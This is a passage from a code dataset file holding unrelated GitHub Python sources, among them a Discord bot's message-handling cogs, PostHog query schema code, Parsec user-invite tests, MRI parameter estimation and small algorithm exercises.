[os.path.expanduser(\"~/hw.txt\")] #default for convenient school use \nelse:\n raw = sys.argv[1:]\n\ndef days_until(due):\n return (due - datetime.today()).days + 1\n\nanything = False\nfor f in raw:\n if os.path.isfile(f): #guard for file existence\n if os.stat(f).st_size != 0: #check if file is non-empty\n data = pd.read_csv(\n f,\n sep='|',\n skip_blank_lines=True,\n skipinitialspace=True,\n parse_dates=[1],\n names=['task', 'due date', 'required'])\n skip = False\n else:\n print(f\"{f} is empty!\")\n skip = True\n else:\n print(f\"{f} isn't a file!\")\n skip = True\n\n if not skip:\n for _, r in data.iterrows():\n task = r[0]\n required = r[2]\n due = datetime.strptime(r[1], \"%A %m/%d \")\n due = due.replace(year=date.today().year)\n until = days_until(due)\n\n if until<=required and until>0:\n print(f\"{until} day{'' if until==1 else 's'} until {task}({required} needed)\")\n anything = True\n elif until == 0:\n print(f\"{task} due today!\")\n anything = True\n elif until < 0:\n print(f\"{task} is {-until} day{'' if -until==1 else 's'} late!!\")\n anything = True\n\nif not anything:\n print(\"No due dates in range\")\n","repo_name":"fadedlamp42/py-duedate","sub_path":"duedate.py","file_name":"duedate.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4906319177","text":"import asyncio\n\nimport discord\nfrom discord.ext import commands\n\nfrom config import OFFICER_ROLE\nimport cogs.CONSTANTS as CONSTANTS\nfrom database.database import SQLCursor, SQLConnection\n\n\nclass ALBotMessageDeletionHandlers(commands.Cog, name='Message Deletion Handlers'):\n \"\"\" Functions for handling tracked messages \"\"\"\n\n def __init__(self, bot: commands.Bot, db):\n self.bot = bot\n self.db = db\n\n @commands.Cog.listener()\n async def on_raw_reaction_add(self, payload):\n \"\"\" Checks reactions and deletes tracked messages when necessary. \"\"\"\n if payload.user_id == self.bot.user.id:\n return\n if payload.emoji.name == CONSTANTS.REACTION_DELETE:\n is_tracked = False\n sender_uid = None\n with SQLCursor(self.db) as cur:\n cur.execute(\"SELECT messid, sender_uid FROM tracked_messages WHERE messid=?\", (payload.message_id,))\n row = cur.fetchone()\n if row:\n is_tracked = True\n sender_uid = row[1]\n\n if is_tracked:\n reacting_member = self.bot.get_guild(payload.guild_id).get_member(payload.user_id)\n can_delete = self.bot.get_channel(payload.channel_id).permissions_for(reacting_member).manage_messages\n if payload.user_id == sender_uid or can_delete:\n relevant_message = await self.bot.get_channel(payload.channel_id).fetch_message(payload.message_id)\n await relevant_message.delete()\n\n\nasync def track(message, author=None):\n \"\"\" Marks a message in the database so that it will be automatically\n deleted if the sender or an admin reacts with the 'trash' emoji\n \"\"\"\n await message.add_reaction(CONSTANTS.REACTION_DELETE)\n sql_db = SQLConnection()\n aid = 0\n if author:\n aid = author.id\n with SQLCursor(sql_db) as cur:\n cur.execute(\"INSERT INTO tracked_messages (messid, sender_uid, track_time) VALUES (?, ?, ?);\",\n (message.id, aid, message.created_at))\n\n\nclass ALBotFactorialHandler(commands.Cog, name='Factorial Handler'):\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.Cog.listener()\n async def on_message(self, msg):\n \"\"\"Checks message for factorial format using regex.\"\"\"\n if msg.author != self.bot.user:\n import re\n filtered_msg = re.findall('{(?:[0-9]|[1-8](?:[0-9]{1,2})?)!}', msg.content)\n if filtered_msg is not None:\n group_len = len(filtered_msg)\n factorial = 'Factorial: `{}! = {}`' if group_len == 1 else 'The following factorials were calculated ' \\\n 'as:```'\n import math\n if group_len > 1:\n for i in range(0, group_len):\n num = int((filtered_msg[i].split('!')[0])[1:])\n product = math.factorial(num)\n factorial += '\\n\\n{}! = {}'.format(num, product)\n await msg.channel.send(factorial + '```')\n elif group_len == 1:\n try:\n num = int((filtered_msg[0].split('!')[0])[1:])\n await msg.channel.send(factorial.format(num, math.factorial(num)))\n except discord.HTTPException:\n await msg.channel.send(\n 'Cannot post answer due to excessive character count! Maximum factorial allowed is `801!`.')\n\n\nclass ALBotMessageClear(commands.Cog, name='Message Clear'):\n \"\"\"Functions for handling message deletion in channels\"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.has_role(OFFICER_ROLE)\n @commands.command()\n async def clear(self, ctx, a_number):\n # Checks if number is positive int\n if not a_number.isdigit() or not int(a_number) > 0:\n await ctx.channel.send(content=\"Please input a number larger than zero\")\n return\n\n # checks the message reaction to see if the user confirms or cancels the command and returns True or False\n # respectively\n async def confirms(self, ctx, user, bot_msg):\n while True:\n\n def check(reaction: discord.Reaction, adder: discord.User) -> bool:\n return adder == user and reaction.message.id == bot_msg.id\n\n reaction, adder = await self.bot.wait_for('reaction_add', timeout=30.0, check=check)\n\n if reaction.emoji == \"✅\":\n return True\n elif reaction.emoji == \"❌\":\n return False\n\n # checks user permissions to see if they can manage messages in the channel\n if self.bot.get_channel(ctx.channel.id).permissions_for(ctx.author).manage_messages:\n user = ctx.channel.last_message.author\n user_msg = ctx.channel.last_message\n\n # warns the user and confirms the clear command\n await ctx.channel.send(\n \"WARNING: You are about to delete {} messages, are you sure you want to do this?\".format(a_number))\n bot_msg = ctx.channel.last_message\n\n # adds reactions to the bot message\n reactions = [\"✅\", \"❌\"]\n for emoji in reactions:\n await bot_msg.add_reaction(emoji)\n\n # Waits 30s for a user reaction and continues only if they respond with ❌ or ✅\n try:\n cont = await confirms(self, ctx, user, bot_msg)\n except asyncio.TimeoutError:\n await bot_msg.delete()\n await ctx.channel.send('Clear command Timeout')\n return\n\n # Cancels the command and deletes the bot message\n if not cont:\n await bot_msg.delete()\n await ctx.channel.send(content='Clear command cancelled')\n return\n\n # deletes bot message, user msg, then loops through channel deleting messages\n await bot_msg.delete()\n await user_msg.delete()\n async for message in ctx.channel.history(limit=int(a_number)):\n if not message.pinned:\n await message.delete()\n await asyncio.sleep(0.4)\n await ctx.channel.send(content='@{} Successfully deleted {} messages'.format(ctx.author, int(a_number)))\n\n\ndef setup(bot: commands.Bot):\n bot.add_cog(ALBotMessageDeletionHandlers(bot, SQLConnection()))\n bot.add_cog(ALBotFactorialHandler(bot))\n bot.add_cog(ALBotMessageClear(bot))\n","repo_name":"ufosc/albot-and-albota","sub_path":"cogs/messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":6657,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"37038404254","text":"def combinationSum(candidates,target):\n res = [];\n candidates.sort();\n dfs(0,target,candidates,[],res);\n return res;\ndef dfs(start,target,candidates,path,res):\n if target < 0:\n return;\n if target == 0:\n res.append(path);\n return;\n for i in range(start,len(candidates)):\n dfs(i, target-candidates[i],candidates,path+[candidates[i]],res);\n\n\nprint(combinationSum([2,3,6,7],7));\n","repo_name":"leneyi/crackAlgorithm","sub_path":"combinationSum.py","file_name":"combinationSum.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16460902185","text":"\"\"\"\r\n1)\r\nНаписать генератор нечётных чисел от 1 до n (включительно),\r\nиспользуя ключевое слово yield\r\n\"\"\"\r\nnum = int(input('Введите число:'))\r\ndef odd_nums(num):\r\n for num in range(1, num + 1, 2):\r\n yield num\r\n\r\nfor i in odd_nums(num):\r\n print(i)\r\n\r\n\r\n'''\r\n2\r\n* (вместо 1) Решить задачу генерации нечётных чисел от 1 до n (включительно),\r\nне используя ключевое слово yield.\r\n'''\r\n\r\nprint(*[num for num in range(1, int(input(\"Введите число:\")) + 1, 2)])\r\n\r\n\r\n","repo_name":"ImMarat/home_work_for_lesson_5","sub_path":"home_work_1_and_2_for_Lesson_5.py","file_name":"home_work_1_and_2_for_Lesson_5.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39510842369","text":"from typing import Dict, List\n\nfrom posthog.hogql.database.models import (\n Table,\n StringDatabaseField,\n DateTimeDatabaseField,\n IntegerDatabaseField,\n LazyJoin,\n FieldTraverser,\n DatabaseField,\n LazyTable,\n FieldOrTable,\n)\nfrom posthog.hogql.database.schema.person_distinct_ids import (\n PersonDistinctIdsTable,\n join_with_person_distinct_ids_table,\n)\nfrom posthog.schema import HogQLQueryModifiers\n\nSESSION_REPLAY_EVENTS_COMMON_FIELDS: Dict[str, FieldOrTable] = {\n \"session_id\": StringDatabaseField(name=\"session_id\"),\n \"team_id\": IntegerDatabaseField(name=\"team_id\"),\n \"distinct_id\": StringDatabaseField(name=\"distinct_id\"),\n \"min_first_timestamp\": DateTimeDatabaseField(name=\"min_first_timestamp\"),\n \"max_last_timestamp\": DateTimeDatabaseField(name=\"max_last_timestamp\"),\n \"first_url\": DatabaseField(name=\"first_url\"),\n \"click_count\": IntegerDatabaseField(name=\"click_count\"),\n \"keypress_count\": IntegerDatabaseField(name=\"keypress_count\"),\n \"mouse_activity_count\": IntegerDatabaseField(name=\"mouse_activity_count\"),\n \"active_milliseconds\": IntegerDatabaseField(name=\"active_milliseconds\"),\n \"console_log_count\": IntegerDatabaseField(name=\"console_log_count\"),\n \"console_warn_count\": IntegerDatabaseField(name=\"console_warn_count\"),\n \"console_error_count\": IntegerDatabaseField(name=\"console_error_count\"),\n \"size\": IntegerDatabaseField(name=\"size\"),\n \"event_count\": IntegerDatabaseField(name=\"event_count\"),\n \"message_count\": IntegerDatabaseField(name=\"message_count\"),\n \"pdi\": LazyJoin(\n from_field=\"distinct_id\",\n join_table=PersonDistinctIdsTable(),\n join_function=join_with_person_distinct_ids_table,\n ),\n \"person\": FieldTraverser(chain=[\"pdi\", \"person\"]),\n \"person_id\": FieldTraverser(chain=[\"pdi\", \"person_id\"]),\n}\n\n\nclass RawSessionReplayEventsTable(Table):\n fields: Dict[str, FieldOrTable] = {\n **SESSION_REPLAY_EVENTS_COMMON_FIELDS,\n \"min_first_timestamp\": DateTimeDatabaseField(name=\"min_first_timestamp\"),\n \"max_last_timestamp\": DateTimeDatabaseField(name=\"max_last_timestamp\"),\n \"first_url\": DatabaseField(name=\"first_url\"),\n }\n\n def avoid_asterisk_fields(self) -> List[str]:\n return [\"first_url\"]\n\n def to_printed_clickhouse(self, context):\n return \"session_replay_events\"\n\n def to_printed_hogql(self):\n return \"raw_session_replay_events\"\n\n\ndef select_from_session_replay_events_table(requested_fields: Dict[str, List[str]]):\n from posthog.hogql import ast\n\n table_name = \"raw_session_replay_events\"\n\n aggregate_fields = {\n \"start_time\": ast.Call(name=\"min\", args=[ast.Field(chain=[table_name, \"min_first_timestamp\"])]),\n \"end_time\": ast.Call(name=\"max\", args=[ast.Field(chain=[table_name, \"max_last_timestamp\"])]),\n \"first_url\": ast.Call(name=\"argMinMerge\", args=[ast.Field(chain=[table_name, \"first_url\"])]),\n \"click_count\": ast.Call(name=\"sum\", args=[ast.Field(chain=[table_name, \"click_count\"])]),\n \"keypress_count\": ast.Call(name=\"sum\", args=[ast.Field(chain=[table_name, \"keypress_count\"])]),\n \"mouse_activity_count\": ast.Call(name=\"sum\", args=[ast.Field(chain=[table_name, \"mouse_activity_count\"])]),\n \"active_milliseconds\": ast.Call(name=\"sum\", args=[ast.Field(chain=[table_name, \"active_milliseconds\"])]),\n \"console_log_count\": ast.Call(name=\"sum\", args=[ast.Field(chain=[table_name, \"console_log_count\"])]),\n \"console_warn_count\": ast.Call(name=\"sum\", args=[ast.Field(chain=[table_name, \"console_warn_count\"])]),\n \"console_error_count\": ast.Call(name=\"sum\", args=[ast.Field(chain=[table_name, \"console_error_count\"])]),\n \"distinct_id\": ast.Call(name=\"any\", args=[ast.Field(chain=[table_name, \"distinct_id\"])]),\n \"size\": ast.Call(name=\"sum\", args=[ast.Field(chain=[table_name, \"size\"])]),\n \"event_count\": ast.Call(name=\"sum\", args=[ast.Field(chain=[table_name, \"event_count\"])]),\n \"message_count\": ast.Call(name=\"sum\", args=[ast.Field(chain=[table_name, \"message_count\"])]),\n }\n\n select_fields: List[ast.Expr] = []\n group_by_fields: List[ast.Expr] = []\n\n for name, chain in requested_fields.items():\n if name in aggregate_fields:\n select_fields.append(ast.Alias(alias=name, expr=aggregate_fields[name]))\n else:\n select_fields.append(ast.Alias(alias=name, expr=ast.Field(chain=[table_name] + chain)))\n group_by_fields.append(ast.Field(chain=[table_name] + chain))\n\n return ast.SelectQuery(\n select=select_fields,\n select_from=ast.JoinExpr(table=ast.Field(chain=[table_name])),\n group_by=group_by_fields,\n )\n\n\nclass SessionReplayEventsTable(LazyTable):\n fields: Dict[str, FieldOrTable] = {\n **SESSION_REPLAY_EVENTS_COMMON_FIELDS,\n \"start_time\": DateTimeDatabaseField(name=\"start_time\"),\n \"end_time\": DateTimeDatabaseField(name=\"end_time\"),\n \"first_url\": StringDatabaseField(name=\"first_url\"),\n }\n\n def lazy_select(self, requested_fields: Dict[str, List[str]], modifiers: HogQLQueryModifiers):\n return select_from_session_replay_events_table(requested_fields)\n\n def to_printed_clickhouse(self, context):\n return \"session_replay_events\"\n\n def to_printed_hogql(self):\n return \"session_replay_events\"\n","repo_name":"PostHog/posthog","sub_path":"posthog/hogql/database/schema/session_replay_events.py","file_name":"session_replay_events.py","file_ext":"py","file_size_in_byte":5358,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"5679306819","text":"# -*- coding: utf-8 -*-\n\"\"\"\nHelper function to parse config files (without section headers).\n\"\"\"\n\nimport configparser\n\n\nCONFIG_PATH = 'config.cfg'\n\n\ndef get(key):\n try:\n with open(CONFIG_PATH, 'r') as f:\n config_string = '[DEFAULT]\\n' + f.read()\n config = configparser.ConfigParser()\n config.read_string(config_string)\n return config['DEFAULT'][key]\n except: return False\n return False\n","repo_name":"wottpal/Automated-Melanoma-Classification","sub_path":"helpers/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"73810302889","text":"from parsec.backend.backend_events import BackendEvent\nfrom parsec.event_bus import MetaEvent\nimport pytest\nimport trio\nfrom async_generator import asynccontextmanager\n\nfrom parsec.api.protocol import apiv1_user_invite_serializer, UserID\nfrom parsec.backend.user import PEER_EVENT_MAX_WAIT, UserInvitation\n\n\n@asynccontextmanager\nasync def user_invite(sock, **kwargs):\n reps = []\n await sock.send(apiv1_user_invite_serializer.req_dumps({\"cmd\": \"user_invite\", **kwargs}))\n yield reps\n raw_rep = await sock.recv()\n rep = apiv1_user_invite_serializer.rep_loads(raw_rep)\n reps.append(rep)\n\n\n@pytest.mark.trio\nasync def test_user_invite(monkeypatch, backend, apiv1_alice_backend_sock, alice, mallory):\n dummy_user_id = UserID(\"dummy\")\n await backend.user.create_user_invitation(\n alice.organization_id, UserInvitation(dummy_user_id, alice.device_id)\n )\n\n user_invitation_created = trio.Event()\n\n vanilla_create_user_invitation = backend.user.create_user_invitation\n\n async def _mocked_create_user_invitation(*args, **kwargs):\n ret = await vanilla_create_user_invitation(*args, **kwargs)\n user_invitation_created.set()\n return ret\n\n monkeypatch.setattr(backend.user, \"create_user_invitation\", _mocked_create_user_invitation)\n\n with trio.fail_after(1):\n async with user_invite(apiv1_alice_backend_sock, user_id=mallory.user_id) as prep:\n\n # Wait for invitation to be created before fetching it !\n await user_invitation_created.wait()\n\n # No the user we are waiting for\n await backend.user.claim_user_invitation(\n alice.organization_id, dummy_user_id, b\"\"\n )\n\n await backend.user.claim_user_invitation(\n alice.organization_id, mallory.user_id, b\"\"\n )\n\n assert prep[0] == {\"status\": \"ok\", \"encrypted_claim\": b\"\"}\n\n\n@pytest.mark.trio\nasync def test_user_invite_already_exists(backend, apiv1_alice_backend_sock, alice, bob):\n with trio.fail_after(1):\n async with user_invite(apiv1_alice_backend_sock, user_id=bob.user_id) as prep:\n pass\n assert prep[0] == {\"status\": \"already_exists\", \"reason\": f\"User `{bob.user_id}` already exists\"}\n\n\n@pytest.mark.trio\nasync def test_user_invite_timeout(mock_clock, backend, apiv1_alice_backend_sock, alice, mallory):\n with backend.event_bus.listen() as spy:\n async with user_invite(apiv1_alice_backend_sock, user_id=mallory.user_id) as prep:\n\n await spy.wait_with_timeout(\n MetaEvent.EVENT_CONNECTED, {\"event_type\": BackendEvent.USER_CLAIMED}\n )\n mock_clock.jump(PEER_EVENT_MAX_WAIT + 1)\n\n assert prep[0] == {\n \"status\": \"timeout\",\n \"reason\": \"Timeout while waiting for new user to be claimed.\",\n }\n\n\n@pytest.mark.trio\nasync def test_user_invite_not_admin(apiv1_bob_backend_sock, mallory):\n with trio.fail_after(1):\n async with user_invite(apiv1_bob_backend_sock, user_id=mallory.user_id) as prep:\n pass\n assert prep[0] == {\n \"status\": \"not_allowed\",\n \"reason\": \"Only allowed for user with ADMIN profile.\",\n }\n\n\n@pytest.mark.trio\nasync def test_concurrent_user_invite(\n backend, apiv1_alice_backend_sock, apiv1_adam_backend_sock, alice, adam, mallory\n):\n with backend.event_bus.listen() as spy, trio.fail_after(1):\n async with user_invite(apiv1_alice_backend_sock, user_id=mallory.user_id) as prep1:\n\n await spy.wait(MetaEvent.EVENT_CONNECTED, {\"event_type\": BackendEvent.USER_CLAIMED})\n async with user_invite(apiv1_adam_backend_sock, user_id=mallory.user_id) as prep2:\n\n spy.clear()\n await spy.wait(MetaEvent.EVENT_CONNECTED, {\"event_type\": BackendEvent.USER_CLAIMED})\n\n backend.event_bus.send(\n BackendEvent.USER_CLAIMED,\n organization_id=mallory.organization_id,\n user_id=mallory.user_id,\n encrypted_claim=b\"\",\n )\n\n assert prep1[0] == {\"status\": \"ok\", \"encrypted_claim\": b\"\"}\n assert prep2[0] == {\"status\": \"ok\", \"encrypted_claim\": b\"\"}\n\n\n@pytest.mark.trio\nasync def test_user_invite_same_name_different_organizations(\n backend, apiv1_alice_backend_sock, apiv1_otheralice_backend_sock, alice, otheralice, mallory\n):\n # Mallory invitation from first organization\n with backend.event_bus.listen() as spy, trio.fail_after(1):\n async with user_invite(apiv1_alice_backend_sock, user_id=mallory.user_id) as prep:\n\n # Waiting for user.claimed event\n await spy.wait(MetaEvent.EVENT_CONNECTED, {\"event_type\": BackendEvent.USER_CLAIMED})\n\n backend.event_bus.send(\n BackendEvent.USER_CLAIMED,\n organization_id=alice.organization_id,\n user_id=\"foo\",\n encrypted_claim=b\"\",\n )\n backend.event_bus.send(\n BackendEvent.USER_CLAIMED,\n organization_id=alice.organization_id,\n user_id=mallory.user_id,\n encrypted_claim=b\"\",\n )\n\n assert prep[0] == {\"status\": \"ok\", \"encrypted_claim\": b\"\"}\n\n # Mallory invitation from second organization\n with backend.event_bus.listen() as spy, trio.fail_after(1):\n async with user_invite(apiv1_otheralice_backend_sock, user_id=mallory.user_id) as prep:\n\n # Waiting for user.claimed event\n await spy.wait(MetaEvent.EVENT_CONNECTED, {\"event_type\": BackendEvent.USER_CLAIMED})\n\n backend.event_bus.send(\n BackendEvent.USER_CLAIMED,\n organization_id=otheralice.organization_id,\n user_id=\"foo\",\n encrypted_claim=b\"\",\n )\n backend.event_bus.send(\n BackendEvent.USER_CLAIMED,\n organization_id=otheralice.organization_id,\n user_id=mallory.user_id,\n encrypted_claim=b\"\",\n )\n\n assert prep[0] == {\"status\": \"ok\", \"encrypted_claim\": b\"\"}\n","repo_name":"groumage/Parsec-TowardAMoreSecureCloud","sub_path":"tests/backend/user/test_apiv1_user_invite.py","file_name":"test_apiv1_user_invite.py","file_ext":"py","file_size_in_byte":6209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7237656103","text":"from pymongo import MongoClient\nmongo_client = MongoClient()\nimport json\nimport os\n\nprint(mongo_client.list_database_names())\n\n\nmydb = mongo_client[\"hw2\"]\nfactbook = mydb[\"factbook\"]\n\ncurr_dir = os.getcwd()\n\njson_dir = os.path.join(curr_dir, \"all_.jsons/\")\n\nprint(json_dir)\n\nfor filename in os.listdir(json_dir):\n #Obtain File Path.\n file_path = os.path.join(json_dir, filename)\n with open(file_path, \"r\") as f:\n json_data = f.read()\n print(\"N E X T D A T A >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> I N :%s\" %filename)\n # print(json_data)\n # convert into dict.\n dict_data = json.loads(json_data)\n # print(dict_data)\n _id = factbook.insert_one(dict_data)\n print(_id)\n\n\n","repo_name":"josueisonfire/hw2","sub_path":"populator.py","file_name":"populator.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41037172647","text":"import numpy as np\nimport pandas as pd\n\nnew_case = 5\nLayer = 1\n\ndom = np.load('case1/2.5_dom.npy')\na_ele = np.load('case1/a_ele.npy')\nv_ele = np.load('case1/v_ele.npy')\n\na_db = pd.read_csv('case1/2.5_a_db.csv')\nv_db = pd.read_csv('case1/2.5_v_db.csv')\n\na_ele_2 = np.copy(a_ele)\nv_ele_2 = np.copy(v_ele)\n\ndom_2 = np.copy(dom)\nnx, ny, nz = np.shape(dom_2)\n\na_pt = pd.read_csv('case1/2.5_a_pts.csv')\nv_pt = pd.read_csv('case1/2.5_v_pts.csv')\n\n\n\nmin_outlet_index = 2**Layer\nmax_outlet_index = min_outlet_index + 2**Layer\n\nmin_branch_ele = max_outlet_index - 2\nmax_branch_ele = 62 # min_branch_ele + 2**(Layer+1)\n\nfor k in range(nz):\n for j in range(ny):\n for i in range(nx):\n if(a_ele_2[i,j,k] > min_branch_ele and a_ele_2[i,j,k] <= max_branch_ele):\n a_ele_2[i,j,k] = -1\n dom_2[i,j,k] = 0\n if(v_ele_2[i,j,k] > min_branch_ele and v_ele_2[i,j,k] <= max_branch_ele):\n v_ele_2[i,j,k] = -1\n dom_2[i,j,k] = 0\n\nc_dom = np.zeros((nx,ny,nz), dtype = int)\n\ncount = 0\nfor k in range(nz):\n for j in range(ny):\n for i in range(nx):\n if(dom_2[i,j,k] == 0):\n c_dom[i,j,k] = count\n count = count + 1\n\n\na_pt_2 = a_pt.iloc[:max_outlet_index,:]\nv_pt_2 = v_pt.iloc[:max_outlet_index,:]\n\na_out = a_pt_2.iloc[min_outlet_index:,:]\nv_out = v_pt_2.iloc[min_outlet_index:,:]\n\na_db_2 = a_db.iloc[:min_branch_ele+1,:]\nv_db_2 = v_db.iloc[:min_branch_ele+1,:]\n\n\n\nmax_branch_ele = min_branch_ele + 2**(Layer+1)\n\nun_t = np.max(c_dom) + 1\nprint('Layer = ', Layer)\nprint('un_t = ', un_t)\nprint('Branch Element Removed = ', min_branch_ele+1, max_branch_ele)\nprint('Range of Outlets = ', min_outlet_index, max_outlet_index-1)\n \n\n\nnp.save('case'+str(new_case)+'/a_ele.npy',a_ele_2)\nnp.save('case'+str(new_case)+'/v_ele.npy',v_ele_2)\n\nnp.save('case'+str(new_case)+'/2.5_dom.npy', dom_2)\nnp.save('case'+str(new_case)+'/2.5_cdom.npy',c_dom)\n\na_pt_2.to_csv('case'+str(new_case)+'/2.5_a_pts.csv', index=False)\nv_pt_2.to_csv('case'+str(new_case)+'/2.5_v_pts.csv', index=False)\na_out.to_csv('case'+str(new_case)+'/2.5_a_out_pts.csv', index=False)\nv_out.to_csv('case'+str(new_case)+'/2.5_v_out_pts.csv', index=False)\na_db_2.to_csv('case'+str(new_case)+'/2.5_a_db.csv', index=False)\nv_db_2.to_csv('case'+str(new_case)+'/2.5_v_db.csv', index=False)\n\n","repo_name":"amarerohan/PressureDropParameterAnalysis","sub_path":"createCase2_from_Case1.py","file_name":"createCase2_from_Case1.py","file_ext":"py","file_size_in_byte":2357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19177912433","text":"import numpy as np\nfrom estimate.Bloch import *\n# from Bloch import *\n\ndebug = 0\n\nif debug:\n np.set_printoptions(precision=6, suppress=True)\n TE_vals = np.array([0.01, 0.03, 0.04, 0.01])\n TR_vals = np.array([0.6, 0.6, 1, 0.8])\n # print(Bloch(np.array([1.4, 0.4, 0.005]), 0.4, 0.35))\n # print(Bloch(np.array([145.4, 0.2, 0.005]), TE_vals, TR_vals))\n\n # i = 1\n train_im = np.array([62.116354, 55.622071, 67.995199, 72.626893])\n # W_i = np.array([106.0 , 0.2, 0.004]) ## Best LS value\n W_i = np.array([56.0 , 0.1, 0.001])\n # print( sum( (Bloch(W_i, TE_vals, TR_vals) - train_im) ** 2) )\n sigma_train = np.array([1.3, 1.1, 1.5, 1.1])\n\n\nfrom math import exp, log\nfrom scipy.special import i0, i0e\n\ndef obj_fn(W_i, TE_vec, TR_vec, train_i, sigma):\n m = train_i.size\n pred = Bloch(W_i, TE_vec, TR_vec)\n likeli_sum = 0\n for j in range(m):\n tmp2 = train_i[j]/(sigma[j] ** 2)\n tmp3 = (train_i[j] ** 2 + pred[j] ** 2)/(2 * (sigma[j] ** 2))\n # tmp1 = log(i0(tmp2*pred[j])); ## Possibly creating bugs\n tmp1 = log(i0e(tmp2*pred[j])) + abs(tmp2*pred[j]); ## i0e(x) = exp(-abs(x)) * i0(x) => log(i0e(x)) = -abs(x) + log(i0(x))\n likeli_sum = likeli_sum + (log(tmp2) + tmp1 - tmp3); ## BUG - there is already a half here, also, abs() was not included before (Though it's obvious)\n \n return (-likeli_sum) \n\n## There was a BUG - no minus sign in likelihood (negative log likelihood) - CHECK TODO\n\n\n\n\nif debug:\n print('\\n\\nFirst value\\n')\n print(W_i)\n print(obj_fn(W_i, TE_vals, TR_vals, train_im, sigma_train))\n # print(train_im.shape)\n\n\n\nfrom scipy.optimize import minimize\n\nif debug:\n x0 = W_i\n # bnds = ((0, 450), (0, 1), (0, 1))\n bnds = ((0, 450), (1e-16, 0.77), (0, 0.006))\n additional = (TE_vals, TR_vals, train_im, sigma_train)\n abc = minimize(obj_fn, x0, args=additional, method='L-BFGS-B', bounds = bnds)\n # print(abc)\n print('\\nSecond value\\n')\n print(abc.x)\n print('\\nFirst obj fn value\\n')\n print(obj_fn(x0, TE_vals, TR_vals, train_im, sigma_train))\n print('\\nSecond obj fn value\\n')\n print(obj_fn(abc.x, TE_vals, TR_vals, train_im, sigma_train))\n\n\n\ndef MLE_est(W_init, TE_vec, TR_vec, train_mat, TE_scale, TR_scale, sigma_train, mask):\n bnds = ((0.0001, 450), (exp(-1/(0.01*TR_scale)), exp(-1/(4*TR_scale))), (exp(-1/(0.001*TE_scale)), exp(-1/(0.2*TE_scale))))\n print(bnds)\n\n n, m = train_mat.shape\n print(n)\n W = W_init\n for i in range(n):\n if i % 10000 == 0:\n print(i)\n if mask[i] == 0:\n additional = (TE_vec, TR_vec, train_mat[i], sigma_train)\n x0 = W_init[i]\n abc = minimize(obj_fn, x0, args=additional, method='L-BFGS-B', bounds = bnds)\n W[i,] = abc.x\n \n return W\n\n\n\n\nfrom joblib import Parallel, delayed\n\ndef MLE_est_i(i, W_init, TE_vec, TR_vec, train_mat, bnds, sigma_train, mask):\n if i % 10000 == 0:\n print(i)\n if mask[i] == 0:\n additional = (TE_vec, TR_vec, train_mat[i], sigma_train)\n x0 = W_init[i]\n abc = minimize(obj_fn, x0, args=additional, method='L-BFGS-B', bounds = bnds)\n return abc.x\n else:\n return W_init[i]\n\n\ndef MLE_est_par(W_init, TE_vec, TR_vec, train_mat, TE_scale, TR_scale, sigma_train, mask):\n bnds = ((0.0001, 450), (exp(-1/(0.01*TR_scale)), exp(-1/(4*TR_scale))), (exp(-1/(0.001*TE_scale)), exp(-1/(0.2*TE_scale))))\n x0 = np.array([np.mean(train_mat[0]), exp(-1/(2*TR_scale)), exp(-1/(0.1*TE_scale))])\n\n n, m = train_mat.shape\n print(n)\n W = W_init\n \n W = Parallel(n_jobs=2)(\n delayed(MLE_est_i)(i, W_init, TE_vec, TR_vec, train_mat, bnds, sigma_train, mask) for i in range(n))\n return W\n\n\n","repo_name":"StatPal/DeepSynMRI","sub_path":"estimate/MLE.py","file_name":"MLE.py","file_ext":"py","file_size_in_byte":3739,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"29867498990","text":"#https://leetcode.com/problems/house-robber/\nclass Solution:\n # @param A : list of list of integers\n # @return an integer\n def adjacent(self, A):\n odd = 0\n even = 0\n\n result = [0 ] *len(A[0])\n\n result[0] = max(A[0][0], A[1][0])\n\n\n for i in range(1 ,len(A[0])):\n if i > 1:\n result[i] = max( max(A[1][i], A[0][i]) +result[i - 2], result[i - 1])\n\n else:\n result[i] = max(max(A[1][i], A[0][i]), result[i - 1])\n\n return result[-1]","repo_name":"shawnchriston/leetCodeSolutionsPython","sub_path":"DynamicProgramming/leetcode198.py","file_name":"leetcode198.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22207487267","text":"from yt_concate.models.found import Found\nfrom .step import Step\n\n\nclass Search(Step):\n def process(self, utils, inputs, data):\n found = []\n search_word = inputs['search_word']\n\n for yt in data:\n if not yt.check_caption_file_exists():\n continue\n captions = yt.captions\n for caption in yt.captions:\n if search_word in caption:\n time = captions[caption]\n f = Found(yt, caption, time)\n found.append(f)\n for obj in found:\n print(obj.yt, obj.caption, obj.time)\n return found\n","repo_name":"suhunlin/yt-concate-command-line0722","sub_path":"yt_concate/pipeline/steps/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8192899310","text":"# build Socket of server\n\nimport 